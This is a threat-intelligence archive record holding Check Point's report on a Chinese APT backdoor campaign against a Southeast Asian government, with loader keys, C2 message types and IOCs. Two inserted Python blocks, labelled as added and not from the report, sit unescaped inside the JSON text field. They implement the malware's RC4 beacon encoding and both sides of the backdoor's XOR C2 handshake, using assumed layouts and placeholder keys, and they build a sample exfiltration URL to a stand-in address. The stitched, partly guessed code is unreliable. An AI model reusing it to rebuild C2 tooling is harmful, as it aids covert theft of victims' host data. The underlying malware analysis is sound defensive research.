{
	"id": "c92f1a4a-44aa-4e68-934c-e2f78137ed1e",
	"created_at": "2026-04-07T14:44:09.285104Z",
	"updated_at": "2026-04-10T03:35:55.935142Z",
	"deleted_at": null,
	"sha1_hash": "f1cb527c7fa7997f0076e389562b17cd413e6a43",
	"title": "SharpPanda: Chinese APT Group Targets Southeast Asian Government With Previously Unknown Backdoor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 124597,
	"plain_text": "SharpPanda: Chinese APT Group Targets Southeast Asian\r\nGovernment With Previously Unknown Backdoor\r\nBy michaelab\r\nPublished: 2021-06-03 · Archived: 2026-04-07 14:25:14 UTC\r\nIntroduction\r\nCheck Point Research identified an ongoing surveillance operation targeting a Southeast Asian government. The\r\nattackers use spear-phishing to gain initial access and leverage old Microsoft Office vulnerabilities together with\r\na chain of in-memory loaders to install a previously unknown backdoor on the victims’ machines.\r\nOur investigation shows the operation was carried out by what we believe is a Chinese APT group that has been\r\ntesting and refining the tools in its arsenal for at least three years.\r\nWhile some initial artifacts of this attack have already been analyzed by VinCSS, in this report we reveal the\r\nfull infection chain used in this attack and provide a full analysis of the TTPs used throughout this campaign, as\r\nwell as the new tools uncovered during the research. We also explore the evolution of the actor’s tools since\r\nthey were first seen in the wild.\r\nInfection Chain\r\nThe investigation starts from a campaign of malicious DOCX documents sent to different employees of\r\na government entity in Southeast Asia. In some cases, the emails are spoofed to look as if they came from other\r\ngovernment-related entities. The attachments to these emails are weaponized copies of legitimate-looking official\r\ndocuments and use the remote template technique to pull the next stage from the attacker’s server.\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 1 of 16\n\nFigure 1: Examples of lure documents sent to the victims\r\nEach document downloads a template from a different URL, but with a similar pattern: the working folder\r\ncontains brand names ( ipad , surface , apple , etc.) 
to distinguish between victims.\r\nFigure 2: External template URL\r\nThe remote templates in all cases are RTF files weaponized with a variant of a tool named RoyalRoad. This\r\ntool allows the attacker to create customized documents with embedded objects that exploit the Equation Editor\r\nvulnerabilities of Microsoft Word. Although these vulnerabilities are a few years old, they are still used\r\nby multiple attack groups, and are especially popular with Chinese APT groups.\r\nThe initial documents and RTF files are just the very start of an elaborate multi-stage infection chain, which we\r\nanalyze below.\r\nFigure 3: Full infection chain\r\nRoyalRoad RTF\r\nLike all RoyalRoad RTFs, the next-stage RTF document contains an encrypted payload and shellcode.\r\nFigure 4: RTFobj output, exposing OLE object information\r\nTo decrypt the payload from the package, the shellcode uses the RC4 algorithm with the key 123456 , and the\r\nresulting DLL file is saved as 5.t in the %Temp% folder. The shellcode is also responsible for the persistence\r\nmechanism: it creates a scheduled task named Windows Update that runs the exported function StartW\r\nfrom 5.t with rundll32.exe once a day.\r\nThe use of StartW as an export name is common in Cobalt Strike DLLs, which may indicate that in other cases\r\nthe same toolset is used to deliver Cobalt Strike instead of the payloads described below.\r\n5.t Downloader\r\nThe 5.t DLL’s original name is Download.dll . 
It starts with a common anti-sandboxing technique that detects\r\nacceleration of code execution: it reads the local time before and after a Sleep call and checks whether the\r\nSleep was skipped.\r\nThe loader then gathers data on the victim’s computer, including hostname, OS name and version, system type\r\n(32/64-bit), user name and the MAC addresses of the network adapters. It also queries WMI for anti-virus\r\ninformation.\r\nThe loader encrypts the collected information with RC4 under the key 123456 and base64-encodes it.\r\nThe data is then sent in an HTTP GET request to\r\nhttp://\u003cC\u0026C IP\u003e/\u003cworking_folder\u003e/Main.php?Data=\u003cencrypted_data\u003e with the User-Agent Microsoft\r\nInternet Explorer , after which the loader fetches the response from\r\nhttp://\u003cC\u0026C IP\u003e/\u003cworking_folder\u003e/buy/\u003chostname\u003e.html .\r\nIf the threat actor finds the victim machine interesting, the response from the server contains the next-stage\r\nexecutable in encrypted form, protected the same way as the data sent to the C\u0026C server.\r\nTo verify the integrity of the received message, the loader uses the 64-bit FNV-1a hash to check that the\r\ndecrypted message starts with the prefix A257 , and also calculates the MD5 of the message to make sure it matches\r\nthe one specified at the start of the message.\r\nFigure 5: Start of the decrypted response\r\nFinally, the loader loads the decrypted DLL into memory, starts its execution from the StartW export\r\nand notifies the server of the result.\r\nThe Loader\r\nTo ensure only one instance of the loader is running, the loader first creates an event named\r\n9DJ8;;L;'4299FDS12JS and proceeds only if the event did not exist before.\r\nFor anti-analysis purposes, the loader functionality is implemented as shellcode, which is stored encrypted inside\r\nthe binary. 
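The 5.t downloader’s check-in described above, decoded end to end: an added example, not code from the Check Point report. It implements plain RC4 under the reported key 123456 and the base64 wrapping of the Data= parameter, and reverses both for a captured GET request so the host profile can be read from proxy or packet-capture logs. The C2 address 203.0.113.10 and the host profile are constructed sample values, the field order inside the profile is an assumption, and looks_like_pe is an analyst check (the RTF stage’s RC4-decrypted package should be the 5.t DLL) rather than anything the malware does:

```python
import base64
from urllib.parse import urlparse, unquote

# Key the report gives for the RoyalRoad payload and for the 5.t beacon alike.
RC4_KEY = b'123456'


def rc4(key, data):
    # Plain RC4 (key scheduling, then the keystream generator).
    # Encryption and decryption are the same operation.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def encode_beacon(victim_info):
    # Downloader side: RC4 under 123456, then base64, placed in the Data= parameter.
    return base64.b64encode(rc4(RC4_KEY, victim_info)).decode('ascii')


def decode_beacon_url(url):
    # Analyst side: recover the host profile from a captured GET request.
    # Data= is the only parameter the report mentions, so take the rest of the query.
    query = urlparse(url).query
    if not query.startswith('Data='):
        raise ValueError('no Data= parameter in ' + url)
    # unquote (not unquote_plus) keeps a literal + from the base64 alphabet intact.
    blob = base64.b64decode(unquote(query[len('Data='):]))
    return rc4(RC4_KEY, blob)


def looks_like_pe(decrypted):
    # Analyst sanity check for the RTF stage: the RC4-decrypted package should be
    # the 5.t DLL, so it must start with the MZ header.
    return decrypted[:2] == b'MZ'


# Constructed sample values, not data from the report. The field order inside the
# profile is an assumption; the working folder name follows the brand-name pattern.
SAMPLE_INFO = b'WS-FINANCE-07|Windows 10 Pro 10.0.19041|x64|jdoe|00-1A-2B-3C-4D-5E|Windows Defender'
SAMPLE_URL = 'http://203.0.113.10/surface/Main.php?Data=' + encode_beacon(SAMPLE_INFO)

if __name__ == '__main__':
    print(SAMPLE_URL)
    print(decode_beacon_url(SAMPLE_URL))
```

Because RC4 is symmetric, the same helper decrypts the next-stage response the server returns after base64-decoding it; the MD5 and A257 prefix checks are not reproduced because the page does not give the exact message layout.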
The loader decrypts the shellcode by XORing it with the 32-byte key\r\n[0x8a, 0x4e, 0xd1, 0xbb, 0xc4, 0xcc, 0x75, 0x3a, 0x4b, 0x5f, 0xe1, 0x99, 0x3a, 0x4b, 0x5f, 0x61,\r\n0xd1, 0xbb, 0xc4, 0x50, 0xe4, 0x99, 0x3a, 0x4b, 0xe4, 0x99, 0xcc, 0x75, 0x3a, 0xe4, 0x90, 0x8a] , then\r\nloads the needed libraries and passes execution to the shellcode itself.\r\nFigure 6: List of libraries loaded for the shellcode to dynamically resolve API functions\r\nAnother anti-analysis technique used by the shellcode inside the loader is dynamic API resolving\r\nby the well-known API-hashing method. This way, the loader not only hides its main functionality but also avoids\r\nstatic detection of suspicious API calls, since they are resolved at runtime instead of appearing in the import table.\r\nThe decrypted shellcode contains a configuration that is used to obtain and correctly run the next stage. It includes\r\nthe C\u0026C server IP and port, as well as other values discussed later.\r\nFigure 7: Malware configuration\r\nOnce initialized, the shellcode sends a CONNECT HTTP/1.1 message to the IP:port from the configuration and\r\nfollows up with another message containing the identifier (in our case admin ) XORed with a hardcoded 48-byte\r\nkey. The received message is decrypted in the same way, and the shellcode checks whether it starts with the magic\r\nnumber 0x11d4 . If the server returns valid data, the loader runs several checks on the PE headers, loads the\r\nbackdoor into memory and executes an exported function named MainThread .\r\nThe loader DLL also contains a PE executable in a resource named TXT . 
The executable is named SurvExe\r\nbased on the PDB path left by the attacker:\r\nC:\\Users\\user\\Desktop\\0814-surexe\\x64\\SurvExe\\x64\\Release\\SurvExe.pdb .\r\nThis executable is responsible for copying the file passed to it as a parameter to the TEMP\r\ndirectory under the name OEJFISDOFJDLK . However, the resource is never used and seems to have been left by the\r\nattacker from previous malware versions.\r\nThe Backdoor\r\nAs discussed above, at the final stage of the infection chain the loader is supposed to download,\r\ndecrypt and load a DLL file into memory. In theory, this plug-in architecture could be used to download and\r\ninstall any other module in addition to the backdoor we received.\r\nThe backdoor module appears to be a custom and unique malware with the internal name VictoryDll_x86.dll .\r\nThe backdoor capabilities include the ability to:\r\nDelete/Create/Rename/Read/Write files and get file attributes\r\nGet process and service information\r\nGet screenshots\r\nPipe Read/Write – run commands through cmd.exe\r\nCreate/Terminate processes\r\nGet TCP/UDP tables\r\nGet CD-ROM drive data\r\nGet registry key info\r\nGet the titles of all top-level windows\r\nGet victim’s computer information – computer name, user name, gateway address, adapter data, Windows\r\nversion (major/minor version and build number) and type of user\r\nShut down the PC\r\nC\u0026C Communication\r\nFor the C\u0026C communication, the backdoor uses the same configuration as the previous step, which\r\ncontains the server IP and port.\r\nFirst, it sends the “Start conversation” ( 0x540 ) message to the server, XORed with a hard-coded 256-byte key.\r\nFigure 8: “Start conversation” request sent by the backdoor\r\nThe server, in turn, returns the “Get Victim Information” ( 0x541 ) message and a new 256-byte key 
that will be\r\nused for all subsequent communication.\r\nFigure 9: Response from C\u0026C server\r\nAll subsequent communication with the C\u0026C server has the following format:\r\n[ Size ] followed by XORed [ TypeID ] and [ Data ] (with the 256-byte key).\r\nThe full list of commands and message types exchanged between the C\u0026C and the backdoor is provided in\r\nAppendix A.\r\nSome History\r\nSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to\r\nVirusTotal in 2018. The files were named MClient by the author and appear to be part of a project internally\r\ncalled SharpM , according to their PDB paths. Compilation timestamps also show a similar timeframe, between\r\nJuly 2017 and June 2018, and upon examination the files were found to be older test versions of the\r\nVictoryDll backdoor and its loader chain.\r\nThe numerous similarities include:\r\nThe specific implementation of the main backdoor functionality is identical;\r\nThe SurvExe resource in the loader is very similar to one of MClient ’s methods and uses the same\r\nevent name pattern. SurvExe also seems to have inherited the masquerading technique from MClient –\r\nboth were internally named svchost.exe .\r\nFigure 10: SurvExe module code compared to MClient’s code (right)\r\nThe connection method has the same format. 
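The XOR layer shared by the loader (the 32-byte key listed in the Loader section) and the backdoor’s C2 channel (the 256-byte key and the [Size][TypeID][Data] framing described above), as an added example that is not code from the report. The loader key is the one printed above; everything else is an assumption: a 4-byte little-endian size field in the clear followed by a 4-byte little-endian TypeID and the payload under the 256-byte key, a placeholder initial key (the report does not print the hard-coded one), and a constructed replacement key delivered in the 0x541 response. The handshake function walks through both sides of the first exchange, 0x540 under the initial key, 0x541 carrying the new key, then the victim information (type 0x2) under the new key:

```python
# Loader shellcode key as listed in the report (32 bytes).
LOADER_XOR_KEY = bytes.fromhex(
    '8a4ed1bbc4cc753a4b5fe1993a4b5f61d1bbc450e4993a4be499cc753ae4908a'
)

START_CONVERSATION = 0x540   # sent by the victim, zero-byte payload
GET_VICTIM_INFO = 0x541      # server reply carrying the new 256-byte key
SEND_VICTIM_INFO = 0x2

# Placeholder keys: the report does not print the hard-coded 256-byte key,
# and the replacement key is whatever the server chooses. Both are constructed here.
INITIAL_KEY = bytes(range(256))
NEW_KEY = bytes((i * 7 + 3) % 256 for i in range(256))


def xor_repeat(data, key):
    # Repeating-key XOR: the loader uses it with the 32-byte key above,
    # the backdoor channel with a 256-byte key.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_loader_shellcode(blob):
    return xor_repeat(blob, LOADER_XOR_KEY)


def pack_message(type_id, data, key):
    # Assumed wire layout: 4-byte little-endian size in the clear, then the XORed
    # 4-byte TypeID and payload. The report gives the field order but not the widths.
    body = xor_repeat(type_id.to_bytes(4, 'little') + data, key)
    return len(body).to_bytes(4, 'little') + body


def unpack_message(frame, key):
    # Returns (type_id, data, remaining bytes) so several frames can be parsed in a row.
    size = int.from_bytes(frame[:4], 'little')
    body = frame[4:4 + size]
    if len(body) != size:
        raise ValueError('truncated frame')
    plain = xor_repeat(body, key)
    return int.from_bytes(plain[:4], 'little'), plain[4:], frame[4 + size:]


class BackdoorSession:
    # Tracks the key in use: hard-coded at start, replaced by the one in the 0x541 reply.
    def __init__(self, initial_key):
        self.key = initial_key

    def send(self, type_id, data):
        return pack_message(type_id, data, self.key)

    def receive(self, frame):
        type_id, data, rest = unpack_message(frame, self.key)
        if type_id == GET_VICTIM_INFO:
            if len(data) != 256:
                raise ValueError('0x541 must carry a 256-byte key')
            self.key = data   # everything after this point uses the server-supplied key
        return type_id, data, rest


def simulate_handshake(initial_key, new_key, victim_info):
    # Both sides of the first exchange: 0x540 from the victim under the initial key,
    # 0x541 with the new key from the server, then the victim information under the new key.
    victim = BackdoorSession(initial_key)
    server = BackdoorSession(initial_key)
    hello = victim.send(START_CONVERSATION, bytes(1))
    type_id, _, _ = server.receive(hello)
    if type_id != START_CONVERSATION:
        raise ValueError('unexpected first message')
    rekey = server.send(GET_VICTIM_INFO, new_key)
    server.key = new_key
    victim.receive(rekey)
    info = victim.send(SEND_VICTIM_INFO, victim_info)
    type_id, data, _ = server.receive(info)
    return type_id, data


if __name__ == '__main__':
    print(simulate_handshake(INITIAL_KEY, NEW_KEY, b'constructed host profile'))
```

A decoder for captured traffic needs only unpack_message and the key currently in force; the point of tracking the key per session is that everything after the 0x541 response is unreadable with the hard-coded key alone, so a capture that misses the first two messages cannot be decoded without recovering the new key from memory.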
Moreover, MClient ’s connection XOR key and\r\nVictoryDll ’s initial XOR key are the same (in fact, VictoryDll ’s XOR key is the expansion of this key\r\nto 256 bytes):\r\nFigure 11: MClient’s XOR key compared to VictoryDLL’s XOR key (right)\r\nMClient contained an additional DLL called AutoStartup_DLL , whose purpose was to create the\r\nscheduled task called Windows Update – functionality which in our campaign was delegated to the RTF\r\nexploit.\r\nSame but Different\r\nThe backdoor has also undergone some changes in architecture, functionality and naming:\r\nDifferent export function names: in our backdoor, the exported function is named MainThread , while in all\r\nversions of the MClient variant the export function was named GetCPUID .\r\nSame configuration fields, but different obfuscation. In the later version, the configuration is part\r\nof the encrypted shellcode inside the loader, whereas in MClient the configuration is hardcoded in the\r\nbackdoor, XORed with the byte 0x56 or, in some test versions, not obfuscated at all.\r\nMClient has an additional persistence mechanism besides the scheduled task that VictoryDll has in\r\nits infection chain: in case of low privileges, on Windows 10, or when Kaspersky is installed on the victim’s\r\ncomputer, MClient adds itself to the SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry key under the\r\nname Intel USB3 Driver .\r\nMClient versions from 2018 contain code that bypasses UAC using wusa.exe. 
In VictoryDll this\r\nfunction no longer exists; instead, the code only determines the user’s privilege level by attempting\r\nto open the file C:\\Windows\\l and checking the result of that operation.\r\nThe MClient version from January 2018 ( aa5458bdfefe2a97611bb0fd9cf155a06f88ef5d ) also contained\r\nkeylogger functionality, which was removed in subsequent test versions and is not present in\r\nVictoryDll .\r\nOverall, we can see that over these three years most of the functionality of MClient and AutoStartup_DLL was\r\npreserved and split between multiple components, probably to complicate analysis and decrease detection\r\nrates at each stage. We may also assume that other modules based on the 2018 code exist and might be\r\ninstalled by the attacker in later stages of the attack.\r\nInfrastructure\r\nFirst-stage C\u0026C servers are hosted by two different cloud services located in Asia (Hong Kong and Malaysia). The\r\nbackdoor C\u0026C server, 107.148.165[.]151 , is hosted on Zenlayer, a US-based provider that is widely used for\r\nC\u0026C purposes by multiple threat actors.\r\nThe threat actor operates the C\u0026C servers in a limited daily window, making it harder to gain access to the\r\nadvanced parts of the infection chain. Specifically, the servers returned the next-stage payloads only between 01:00 and 08:00\r\nUTC on workdays.\r\nAt some point in the research, one of the attacker’s servers that served the loader component had directory listing\r\nenabled for a limited time. 
In addition, the Main.php file was served without being processed and revealed a\r\npiece of PHP code whose purpose was to log every incoming request, with the date, IP address and decrypted\r\ndata, to log.txt .\r\nFigure 12: File listing on the server\r\nFigure 13: Fragment of the simple PHP code that logs the requests, found on the server\r\nAttribution\r\nWe attribute this cluster of activity to a Chinese threat group with medium to high confidence, based on the\r\nfollowing artifacts and indicators:\r\nThe RoyalRoad RTF exploit building kit mentioned above has been reported by numerous researchers as a\r\ntool of choice among Chinese APT groups.\r\nThe C\u0026C servers returned payloads only between 01:00 and 08:00 UTC, which we believe are the working\r\nhours in the attackers’ country; this limits the range of possible origins of this attack.\r\nThe C\u0026C servers did not return any payload (even during working hours) during the period between\r\nMay 1st and 5th, which is when the Labor Day holidays in China took place.\r\nSome test versions of the backdoor contained an internet connectivity check against www.baidu.com , a leading\r\nChinese website.\r\nSome test versions of the backdoor from 2018 were uploaded to VirusTotal from China.\r\nFigure 14: Submissions for test backdoors (f8088c15f9ea2a1e167d5fa24b65ec356939ba91 and\r\n7a38ae6df845def6f28a4826290f1726772b247e)\r\nWhile we could identify overlaps in TTPs with multiple Chinese APT groups, we have been unable to attribute\r\nthis set of activities to any known group.\r\nConclusion\r\nWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under\r\nthe radar 
for more than three years. In this campaign, the attackers utilized a set of Microsoft Office exploits and\r\nloaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\r\nAnalyzing the backdoor’s code evolution since its first appearance in the wild showed how it transformed from a\r\nsingle executable into a multi-stage attack, making it harder to detect and investigate.\r\nCheck Point Threat Emulation blocks this attack from the very first step.\r\nAppendix A: Backdoor Commands\r\nMessage Type | Type ID | Arguments (request / response) | Source\r\nSend victim’s information | 0x2 | Info | Victim\r\nCDROM drives data | 0x4 | – / Drives data | Both\r\nGet Files data | 0x5/0x6 | Path / Files data | Both\r\nCreate Process | 0x7 | Command Line | C\u0026C server\r\nRename File | 0x8 | Old filename, New filename | C\u0026C server\r\nDelete File | 0x9 | Filename | C\u0026C server\r\nRead File | 0xa | Filename, Offset / File’s content | Both\r\nExit Pipe | 0xb | – | C\u0026C server\r\nCreate Pipe | 0xc | – | C\u0026C server\r\nWrite To Pipe | 0xd | Buffer | C\u0026C server\r\nGet Uninstalled software data | 0xe | – / Software data | Both\r\nGet windows text | 0xf | – / Windows text | Both\r\nGet active processes data | 0x10 | – / Processes data | Both\r\nTerminate Process | 0x11 | Process ID | C\u0026C server\r\nGet screenshot | 0x12/0x13 | – / Screenshot temp file | Both\r\nGet services data | 0x14 | – / Services data | Both\r\nGet TCP/UDP tables | 0x15 | – / Tables data | Both\r\nGet registry key data | 0x16 | Registry path / Reg data | Both\r\nShutdown | 0x17 | – | C\u0026C server\r\nExit process | 0x18 | – | C\u0026C server\r\nRestart current process | 0x19 | – | C\u0026C server\r\nWrite to file | 0x4C7 | Filename, Buffer | C\u0026C server\r\nStart Connection | 0x540 | Zero Byte | Victim\r\nGet victim’s information/Update XOR key | 0x541 | New XOR key / Victim’s info | Both\r\nNone | 0x120E | – | C\u0026C server\r\nAck | 0x129D3 | Name (‘admin’ in our case) | Victim\r\nAppendix B: Indicators of Compromise\r\nDocuments\r\n278c4fc89f8e921bc6c7d015e3445a1cc6319a66\r\n42be0232970d5274c5278de77d172b7594ff6755\r\nf9d958c537b097d45b4fca83048567a52bb597bf\r\nfefec06620f2ef48f24b2106a246813c1b5258f4\r\n548bbf4b79eb5a173741e43aa4ba17b92be8ed3a\r\n417e4274771a9614d49493157761c12e54060588\r\nExecutables\r\n03a57262a2f3563cf0faef5cde5656da437d58ce 5.t\r\n388b7130700dcc45a052b8cd447d1eb76c9c2c54 5.t\r\n176a0468dd70abe199483f1af287e5c5e2179b8c 5.t\r\n01e1913b1471e7a1d332bfc8b1e54b88350cb8ad loader\r\n8bad3d47b2fc53dc6f9e48debac9533937c32609 ServExe (x64)\r\n0a588f02e60de547969d000968a458dcdc341312 VictoryDll\r\nC\u0026C servers\r\n45.91.225[.]139\r\n107.148.165[.]151\r\n45.121.146[.]88\r\nOld backdoor versions\r\nMClient:\r\naa5458bdfefe2a97611bb0fd9cf155a06f88ef5d\r\n4da26e656ef5554fac83d1e02105fad0d1bd7979\r\nf8088c15f9ea2a1e167d5fa24b65ec356939ba91\r\n0726e56885478357de3dce13efff40bfba53ddc2\r\n7855a30e933e2b5c3db3661075c065af2e40b94e\r\n696a4df81337e7ecd0ea01ae92d8af3d13855c12\r\nabaaab07985add1771da0c086553fef3974cf742\r\n7a38ae6df845def6f28a4826290f1726772b247e\r\nAutostart_DLL:\r\ne16b08947cc772edf36d97403276b14a5ac966d0\r\nc81ba6c37bc5c9b2cacf0dc53b3105329e6c2ecc\r\na96dfbad7d02b7c0e4a0244df30e11f6f6370dde\r\n6f5315f9dd0db860c18018a961f7929bec642918\r\nAppendix C: MITRE ATT\u0026CK Matrix\r\nTactic | Technique | Technique Name\r\nInitial Access | T1566.001 | Phishing: Spearphishing Attachment\r\nExecution | T1204.002 | User Execution: Malicious File\r\nExecution | T1203 | Exploitation for Client Execution\r\nExecution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell\r\nPersistence | T1053 | Scheduled Task/Job\r\nDefense Evasion | T1027 | Obfuscated Files or Information\r\nDefense Evasion | T1221 | Template Injection\r\nDiscovery | T1082 | System Information Discovery\r\nDiscovery | T1518 | Software Discovery\r\nDiscovery | T1057 | Process Discovery\r\nDiscovery | T1012 | Query Registry\r\nDiscovery | T1007 | System Service Discovery\r\nDiscovery | T1083 | File and Directory Discovery\r\nDiscovery | T1010 | Application Window Discovery\r\nCollection | T1113 | Screen Capture\r\nCollection | T1005 | Data from Local System\r\nCommand and Control | T1132 | Data Encoding\r\nCommand and Control | T1104 | Multi-Stage Channels\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols\r\nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography\r\nExfiltration | T1041 | Exfiltration Over C2 Channel\r\nImpact | T1529 | System Shutdown/Reboot\r\nSource: https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MISPGALAXY"
	],
	"references": [
		"https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/"
	],
	"report_names": [
		"chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor"
	],
	"threat_actors": [
		{
			"id": "8a3bd03a-f69b-455b-b88b-3842a3528bfd",
			"created_at": "2022-10-25T16:07:24.178007Z",
			"updated_at": "2026-04-10T02:00:04.89066Z",
			"deleted_at": null,
			"main_name": "SharpPanda",
			"aliases": [
				"Sharp Dragon",
				"SharpPanda"
			],
			"source_name": "ETDA:SharpPanda",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"RoyalRoad",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e7ef34b6-e7b6-46f3-8dd8-2708c1659cd6",
			"created_at": "2023-11-08T02:00:07.107758Z",
			"updated_at": "2026-04-10T02:00:03.415268Z",
			"deleted_at": null,
			"main_name": "SharpPanda",
			"aliases": [
				"Sharp Dragon"
			],
			"source_name": "MISPGALAXY:SharpPanda",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775573049,
	"ts_updated_at": 1775792155,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f1cb527c7fa7997f0076e389562b17cd413e6a43.pdf",
		"text": "https://archive.orkl.eu/f1cb527c7fa7997f0076e389562b17cd413e6a43.txt",
		"img": "https://archive.orkl.eu/f1cb527c7fa7997f0076e389562b17cd413e6a43.jpg"
	}
}